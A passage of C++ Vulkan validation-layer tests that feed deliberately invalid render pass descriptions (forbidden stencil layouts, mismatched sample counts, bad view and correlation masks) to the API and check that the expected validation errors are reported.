TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03291", "VUID-VkAttachmentDescription2-format-03305"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_GENERAL; } if (stencil_format) { attach_desc.format = stencil_format; attach_desc.initialLayout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03292", "VUID-VkAttachmentDescription2-format-03306"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03292", "VUID-VkAttachmentDescription2-format-03306"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_GENERAL; attach_desc.finalLayout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03293", "VUID-VkAttachmentDescription2-format-03307"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-format-03293", "VUID-VkAttachmentDescription2-format-03307"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_GENERAL; } if (rp2Supported && depth_stencil_format) { attach_desc.format = depth_stencil_format; attach_desc.initialLayout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; auto attachment_description_stencil_layout = lvl_init_struct<VkAttachmentDescriptionStencilLayoutKHR>(); attachment_description_stencil_layout.stencilInitialLayout = VK_IMAGE_LAYOUT_GENERAL; attachment_description_stencil_layout.stencilFinalLayout = VK_IMAGE_LAYOUT_GENERAL; safe_VkRenderPassCreateInfo2 rpci2; ConvertVkRenderPassCreateInfoToV2KHR(rpci, &rpci2); rpci2.pAttachments[0].pNext = &attachment_description_stencil_layout; VkImageLayout forbidden_layouts[] = { VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL, VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR, VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR, VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL, VK_IMAGE_LAYOUT_DEPTH_STENCIL_READ_ONLY_OPTIMAL, VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_STENCIL_READ_ONLY_OPTIMAL, VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_STENCIL_ATTACHMENT_OPTIMAL, }; auto forbidden_layouts_array_size = sizeof(forbidden_layouts) / sizeof(forbidden_layouts[0]); for (size_t i = 0; i < forbidden_layouts_array_size; ++i) { attachment_description_stencil_layout.stencilInitialLayout = forbidden_layouts[i]; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentDescriptionStencilLayout-stencilInitialLayout-03308"); } attachment_description_stencil_layout.stencilInitialLayout = VK_IMAGE_LAYOUT_STENCIL_ATTACHMENT_OPTIMAL_KHR; for (size_t i = 0; i < forbidden_layouts_array_size; ++i) { attachment_description_stencil_layout.stencilFinalLayout = forbidden_layouts[i]; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentDescriptionStencilLayout-stencilFinalLayout-03309"); } attachment_description_stencil_layout.stencilFinalLayout = VK_IMAGE_LAYOUT_UNDEFINED; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentDescriptionStencilLayout-stencilFinalLayout-03310"); attachment_description_stencil_layout.stencilFinalLayout = VK_IMAGE_LAYOUT_PREINITIALIZED; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentDescriptionStencilLayout-stencilFinalLayout-03310"); rpci2.pAttachments[0].pNext = nullptr; } } else { if (depth_format) { attach_desc.format = depth_format; attach_desc.initialLayout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-separateDepthStencilLayouts-03284", "VUID-VkAttachmentDescription2-separateDepthStencilLayouts-03298"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-separateDepthStencilLayouts-03284", "VUID-VkAttachmentDescription2-separateDepthStencilLayouts-03298"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_GENERAL; attach_desc.finalLayout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-separateDepthStencilLayouts-03285", "VUID-VkAttachmentDescription2-separateDepthStencilLayouts-03299"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-separateDepthStencilLayouts-03285", "VUID-VkAttachmentDescription2-separateDepthStencilLayouts-03299"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_GENERAL; } if (stencil_format) { attach_desc.format = stencil_format; attach_desc.initialLayout = VK_IMAGE_LAYOUT_STENCIL_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-separateDepthStencilLayouts-03284", "VUID-VkAttachmentDescription2-separateDepthStencilLayouts-03298"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_STENCIL_READ_ONLY_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-separateDepthStencilLayouts-03284", "VUID-VkAttachmentDescription2-separateDepthStencilLayouts-03298"); attach_desc.initialLayout = VK_IMAGE_LAYOUT_GENERAL; attach_desc.finalLayout = VK_IMAGE_LAYOUT_STENCIL_ATTACHMENT_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-separateDepthStencilLayouts-03285", "VUID-VkAttachmentDescription2-separateDepthStencilLayouts-03299"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_STENCIL_READ_ONLY_OPTIMAL_KHR; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentDescription-separateDepthStencilLayouts-03285", "VUID-VkAttachmentDescription2-separateDepthStencilLayouts-03299"); attach_desc.finalLayout = VK_IMAGE_LAYOUT_GENERAL; } } } TEST_F(VkLayerTest, RenderPassCreateAttachmentsMisc) { TEST_DESCRIPTION( "Ensure that CreateRenderPass produces the expected validation errors when a subpass's attachments violate the valid usage " "conditions."); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); ASSERT_NO_FATAL_FAILURE(InitState()); std::vector<VkAttachmentDescription> attachments = { // input attachments {0, VK_FORMAT_R8G8B8A8_UNORM, VK_SAMPLE_COUNT_4_BIT, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_GENERAL, VK_IMAGE_LAYOUT_GENERAL}, // color attachments {0, VK_FORMAT_R8G8B8A8_UNORM, VK_SAMPLE_COUNT_4_BIT, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}, {0, VK_FORMAT_R8G8B8A8_UNORM, VK_SAMPLE_COUNT_4_BIT, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}, // depth attachment {0, VK_FORMAT_D24_UNORM_S8_UINT, VK_SAMPLE_COUNT_4_BIT, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL, VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL}, // resolve attachment {0, VK_FORMAT_R8G8B8A8_UNORM, VK_SAMPLE_COUNT_1_BIT, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}, // preserve attachments {0, VK_FORMAT_R8G8B8A8_UNORM, VK_SAMPLE_COUNT_4_BIT, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}, }; std::vector<VkAttachmentReference> input = { {0, VK_IMAGE_LAYOUT_GENERAL}, }; std::vector<VkAttachmentReference> color = { {1, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}, {2, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}, }; VkAttachmentReference depth = {3, VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL}; std::vector<VkAttachmentReference> resolve = { {4, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}, {VK_ATTACHMENT_UNUSED, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}, }; std::vector<uint32_t> preserve = {5}; VkSubpassDescription subpass = {0, VK_PIPELINE_BIND_POINT_GRAPHICS, (uint32_t)input.size(), input.data(), (uint32_t)color.size(), color.data(), resolve.data(), &depth, (uint32_t)preserve.size(), preserve.data()}; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, (uint32_t)attachments.size(), attachments.data(), 1, &subpass, 0, nullptr}; // Test too many color attachments const uint32_t max_color_attachments = m_device->props.limits.maxColorAttachments; const uint32_t too_big_max_attachments = 65536 + 1; // let's say this is too much to allocate if (max_color_attachments >= too_big_max_attachments) { printf( "%s VkPhysicalDeviceLimits::maxColorAttachments is too large to practically test against -- skipping part of test.\n", kSkipPrefix); } else { std::vector<VkAttachmentReference> too_many_colors(max_color_attachments + 1, color[0]); VkSubpassDescription test_subpass = subpass; test_subpass.colorAttachmentCount = (uint32_t)too_many_colors.size(); test_subpass.pColorAttachments = too_many_colors.data(); test_subpass.pResolveAttachments = NULL; VkRenderPassCreateInfo test_rpci = rpci; test_rpci.pSubpasses = &test_subpass; TestRenderPassCreate(m_errorMonitor, m_device->device(), &test_rpci, rp2Supported, "VUID-VkSubpassDescription-colorAttachmentCount-00845", "VUID-VkSubpassDescription2-colorAttachmentCount-03063"); } // Test sample count mismatch between color buffers attachments[subpass.pColorAttachments[1].attachment].samples = VK_SAMPLE_COUNT_8_BIT; depth.attachment = VK_ATTACHMENT_UNUSED; // Avoids triggering 01418 TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkSubpassDescription-pColorAttachments-01417", "VUID-VkSubpassDescription2-pColorAttachments-03069"); depth.attachment = 3; attachments[subpass.pColorAttachments[1].attachment].samples = attachments[subpass.pColorAttachments[0].attachment].samples; // Test sample count mismatch between color buffers and depth buffer attachments[subpass.pDepthStencilAttachment->attachment].samples = VK_SAMPLE_COUNT_8_BIT; subpass.colorAttachmentCount = 1; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkSubpassDescription-pDepthStencilAttachment-01418", "VUID-VkSubpassDescription2-pDepthStencilAttachment-03071"); attachments[subpass.pDepthStencilAttachment->attachment].samples = attachments[subpass.pColorAttachments[0].attachment].samples; subpass.colorAttachmentCount = (uint32_t)color.size(); // Test resolve attachment with UNUSED color attachment color[0].attachment = VK_ATTACHMENT_UNUSED; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkSubpassDescription-pResolveAttachments-00847", "VUID-VkSubpassDescription2-pResolveAttachments-03065"); color[0].attachment = 1; // Test resolve from a single-sampled color attachment attachments[subpass.pColorAttachments[0].attachment].samples = VK_SAMPLE_COUNT_1_BIT; subpass.colorAttachmentCount = 1; // avoid mismatch (00337), and avoid double report subpass.pDepthStencilAttachment = nullptr; // avoid mismatch (01418) TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkSubpassDescription-pResolveAttachments-00848", "VUID-VkSubpassDescription2-pResolveAttachments-03066"); attachments[subpass.pColorAttachments[0].attachment].samples = VK_SAMPLE_COUNT_4_BIT; subpass.colorAttachmentCount = (uint32_t)color.size(); subpass.pDepthStencilAttachment = &depth; // Test resolve to a multi-sampled resolve attachment attachments[subpass.pResolveAttachments[0].attachment].samples = VK_SAMPLE_COUNT_4_BIT; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkSubpassDescription-pResolveAttachments-00849", "VUID-VkSubpassDescription2-pResolveAttachments-03067"); attachments[subpass.pResolveAttachments[0].attachment].samples = VK_SAMPLE_COUNT_1_BIT; // Test with color/resolve format mismatch attachments[subpass.pColorAttachments[0].attachment].format = VK_FORMAT_R8G8B8A8_SRGB; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkSubpassDescription-pResolveAttachments-00850", "VUID-VkSubpassDescription2-pResolveAttachments-03068"); attachments[subpass.pColorAttachments[0].attachment].format = attachments[subpass.pResolveAttachments[0].attachment].format; // Test for UNUSED preserve attachments preserve[0] = VK_ATTACHMENT_UNUSED; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkSubpassDescription-attachment-00853", "VUID-VkSubpassDescription2-attachment-03073"); preserve[0] = 5; // Test for preserve attachments used elsewhere in the subpass color[0].attachment = preserve[0]; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkSubpassDescription-pPreserveAttachments-00854", "VUID-VkSubpassDescription2-pPreserveAttachments-03074"); color[0].attachment = 1; input[0].attachment = 0; input[0].layout = VK_IMAGE_LAYOUT_GENERAL; // Test for attachment used first as input with loadOp=CLEAR { std::vector<VkSubpassDescription> subpasses = {subpass, subpass, subpass}; subpasses[0].inputAttachmentCount = 0; subpasses[1].inputAttachmentCount = 0; attachments[input[0].attachment].loadOp = VK_ATTACHMENT_LOAD_OP_CLEAR; VkRenderPassCreateInfo rpci_multipass = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, (uint32_t)attachments.size(), attachments.data(), (uint32_t)subpasses.size(), subpasses.data(), 0, nullptr}; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci_multipass, rp2Supported, "VUID-VkSubpassDescription-loadOp-00846", "VUID-VkSubpassDescription2-loadOp-03064"); attachments[input[0].attachment].loadOp = VK_ATTACHMENT_LOAD_OP_DONT_CARE; } } TEST_F(VkLayerTest, RenderPassCreateAttachmentReferenceInvalidLayout) { TEST_DESCRIPTION("Attachment reference uses PREINITIALIZED or UNDEFINED layouts"); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); if (DeviceExtensionSupported(gpu(), nullptr, VK_KHR_SEPARATE_DEPTH_STENCIL_LAYOUTS_EXTENSION_NAME)) { m_device_extension_names.push_back(VK_KHR_SEPARATE_DEPTH_STENCIL_LAYOUTS_EXTENSION_NAME); } PFN_vkGetPhysicalDeviceFeatures2KHR vkGetPhysicalDeviceFeatures2KHR = (PFN_vkGetPhysicalDeviceFeatures2KHR)vk::GetInstanceProcAddr(instance(), "vkGetPhysicalDeviceFeatures2KHR"); auto separate_depth_stencil_layouts_features = lvl_init_struct<VkPhysicalDeviceSeparateDepthStencilLayoutsFeaturesKHR>(); auto features2 = lvl_init_struct<VkPhysicalDeviceFeatures2KHR>(&separate_depth_stencil_layouts_features); if (vkGetPhysicalDeviceFeatures2KHR) { vkGetPhysicalDeviceFeatures2KHR(gpu(), &features2); } else { separate_depth_stencil_layouts_features.separateDepthStencilLayouts = VK_FALSE; } ASSERT_NO_FATAL_FAILURE(InitState(nullptr, (vkGetPhysicalDeviceFeatures2KHR) ? &features2 : nullptr)); VkAttachmentDescription attach[] = { {0, VK_FORMAT_R8G8B8A8_UNORM, VK_SAMPLE_COUNT_1_BIT, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_ATTACHMENT_LOAD_OP_DONT_CARE, VK_ATTACHMENT_STORE_OP_DONT_CARE, VK_IMAGE_LAYOUT_UNDEFINED, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL}, }; VkAttachmentReference refs[] = { {0, VK_IMAGE_LAYOUT_UNDEFINED}, }; VkSubpassDescription subpasses[] = { {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 1, refs, nullptr, nullptr, 0, nullptr}, }; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, nullptr, 0, 1, attach, 1, subpasses, 0, nullptr}; // Use UNDEFINED layout TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentReference-layout-00857", "VUID-VkAttachmentReference2-layout-03077"); // Use PREINITIALIZED layout refs[0].layout = VK_IMAGE_LAYOUT_PREINITIALIZED; TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkAttachmentReference-layout-00857", "VUID-VkAttachmentReference2-layout-03077"); if (rp2Supported) { safe_VkRenderPassCreateInfo2 rpci2; ConvertVkRenderPassCreateInfoToV2KHR(rpci, &rpci2); if (separate_depth_stencil_layouts_features.separateDepthStencilLayouts) { rpci2.pSubpasses[0].pColorAttachments[0].aspectMask = VK_IMAGE_ASPECT_COLOR_BIT; rpci2.pSubpasses[0].pColorAttachments[0].layout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentReference2-attachment-03314"); rpci2.pSubpasses[0].pColorAttachments[0].layout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentReference2-attachment-03314"); rpci2.pSubpasses[0].pColorAttachments[0].layout = VK_IMAGE_LAYOUT_STENCIL_ATTACHMENT_OPTIMAL_KHR; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentReference2-attachment-03314"); rpci2.pSubpasses[0].pColorAttachments[0].layout = VK_IMAGE_LAYOUT_STENCIL_READ_ONLY_OPTIMAL_KHR; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentReference2-attachment-03314"); rpci2.pSubpasses[0].pColorAttachments[0].aspectMask = VK_IMAGE_ASPECT_DEPTH_BIT | VK_IMAGE_ASPECT_STENCIL_BIT; rpci2.pSubpasses[0].pColorAttachments[0].layout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentReference2-attachment-03315"); rpci2.pSubpasses[0].pColorAttachments[0].layout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentReference2-attachment-03315"); rpci2.pSubpasses[0].pColorAttachments[0].aspectMask = VK_IMAGE_ASPECT_DEPTH_BIT; rpci2.pSubpasses[0].pColorAttachments[0].layout = VK_IMAGE_LAYOUT_STENCIL_ATTACHMENT_OPTIMAL_KHR; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentReference2-attachment-03315"); rpci2.pSubpasses[0].pColorAttachments[0].layout = VK_IMAGE_LAYOUT_STENCIL_READ_ONLY_OPTIMAL_KHR; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentReference2-attachment-03315"); rpci2.pSubpasses[0].pColorAttachments[0].aspectMask = VK_IMAGE_ASPECT_STENCIL_BIT; rpci2.pSubpasses[0].pColorAttachments[0].layout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentReference2-attachment-03317"); rpci2.pSubpasses[0].pColorAttachments[0].layout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentReference2-attachment-03317"); auto attachment_reference_stencil_layout = lvl_init_struct<VkAttachmentReferenceStencilLayoutKHR>(); rpci2.pSubpasses[0].pColorAttachments[0].pNext = &attachment_reference_stencil_layout; VkImageLayout forbidden_layouts[] = {VK_IMAGE_LAYOUT_PREINITIALIZED, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL, VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR, VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR, VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL, VK_IMAGE_LAYOUT_DEPTH_STENCIL_READ_ONLY_OPTIMAL, VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_STENCIL_READ_ONLY_OPTIMAL, VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_STENCIL_ATTACHMENT_OPTIMAL, VK_IMAGE_LAYOUT_PRESENT_SRC_KHR}; rpci2.pSubpasses[0].pColorAttachments[0].aspectMask = VK_IMAGE_ASPECT_DEPTH_BIT | VK_IMAGE_ASPECT_STENCIL_BIT; rpci2.pSubpasses[0].pColorAttachments[0].layout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; for (size_t i = 0; i < (sizeof(forbidden_layouts) / sizeof(forbidden_layouts[0])); ++i) { attachment_reference_stencil_layout.stencilLayout = forbidden_layouts[i]; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentReferenceStencilLayout-stencilLayout-03318"); } rpci2.pSubpasses[0].pColorAttachments[0].pNext = nullptr; } else { rpci2.pSubpasses[0].pColorAttachments[0].layout = VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_OPTIMAL_KHR; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentReference2-separateDepthStencilLayouts-03313"); rpci2.pSubpasses[0].pColorAttachments[0].layout = VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_OPTIMAL_KHR; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentReference2-separateDepthStencilLayouts-03313"); rpci2.pSubpasses[0].pColorAttachments[0].layout = VK_IMAGE_LAYOUT_STENCIL_ATTACHMENT_OPTIMAL_KHR; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentReference2-separateDepthStencilLayouts-03313"); rpci2.pSubpasses[0].pColorAttachments[0].layout = VK_IMAGE_LAYOUT_STENCIL_READ_ONLY_OPTIMAL_KHR; TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), rpci2.ptr(), "VUID-VkAttachmentReference2-separateDepthStencilLayouts-03313"); } } } TEST_F(VkLayerTest, RenderPassCreateOverlappingCorrelationMasks) { TEST_DESCRIPTION("Create a subpass with overlapping correlation masks"); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); if (!rp2Supported) { if (DeviceExtensionSupported(gpu(), nullptr, VK_KHR_MULTIVIEW_EXTENSION_NAME)) { m_device_extension_names.push_back(VK_KHR_MULTIVIEW_EXTENSION_NAME); } else { printf("%s Extension %s is not supported.\n", kSkipPrefix, VK_KHR_MULTIVIEW_EXTENSION_NAME); return; } } ASSERT_NO_FATAL_FAILURE(InitState()); VkSubpassDescription subpass = {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 0, nullptr, nullptr, nullptr, 0, nullptr}; uint32_t viewMasks[] = {0x3u}; uint32_t correlationMasks[] = {0x1u, 0x3u}; VkRenderPassMultiviewCreateInfo rpmvci = { VK_STRUCTURE_TYPE_RENDER_PASS_MULTIVIEW_CREATE_INFO, nullptr, 1, viewMasks, 0, nullptr, 2, correlationMasks}; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, &rpmvci, 0, 0, nullptr, 1, &subpass, 0, nullptr}; // Correlation masks must not overlap TestRenderPassCreate(m_errorMonitor, m_device->device(), &rpci, rp2Supported, "VUID-VkRenderPassMultiviewCreateInfo-pCorrelationMasks-00841", "VUID-VkRenderPassCreateInfo2-pCorrelatedViewMasks-03056"); // Check for more specific "don't set any correlation masks when multiview is not enabled" if (rp2Supported) { viewMasks[0] = 0; correlationMasks[0] = 0; correlationMasks[1] = 0; safe_VkRenderPassCreateInfo2 safe_rpci2; ConvertVkRenderPassCreateInfoToV2KHR(rpci, &safe_rpci2); TestRenderPass2KHRCreate(m_errorMonitor, m_device->device(), safe_rpci2.ptr(), "VUID-VkRenderPassCreateInfo2-viewMask-03057"); } } TEST_F(VkLayerTest, RenderPassCreateInvalidViewMasks) { TEST_DESCRIPTION("Create a subpass with the wrong number of view masks, or inconsistent setting of view masks"); // Check for VK_KHR_get_physical_device_properties2 if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool rp2Supported = CheckCreateRenderPass2Support(this, m_device_extension_names); if (!rp2Supported) { if (DeviceExtensionSupported(gpu(), nullptr, VK_KHR_MULTIVIEW_EXTENSION_NAME)) { m_device_extension_names.push_back(VK_KHR_MULTIVIEW_EXTENSION_NAME); } else { printf("%s Extension %s is not supported.\n", kSkipPrefix, VK_KHR_MULTIVIEW_EXTENSION_NAME); return; } } ASSERT_NO_FATAL_FAILURE(InitState()); VkSubpassDescription subpasses[] = { {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 0, nullptr, nullptr, nullptr, 0, nullptr}, {0, VK_PIPELINE_BIND_POINT_GRAPHICS, 0, nullptr, 0, nullptr, nullptr, nullptr, 0, nullptr}, }; uint32_t viewMasks[] = {0x3u, 0u}; VkRenderPassMultiviewCreateInfo rpmvci = { VK_STRUCTURE_TYPE_RENDER_PASS_MULTIVIEW_CREATE_INFO, nullptr, 1, viewMasks, 0, nullptr, 0, nullptr}; VkRenderPassCreateInfo rpci = {VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO, &rpmvci, 0, 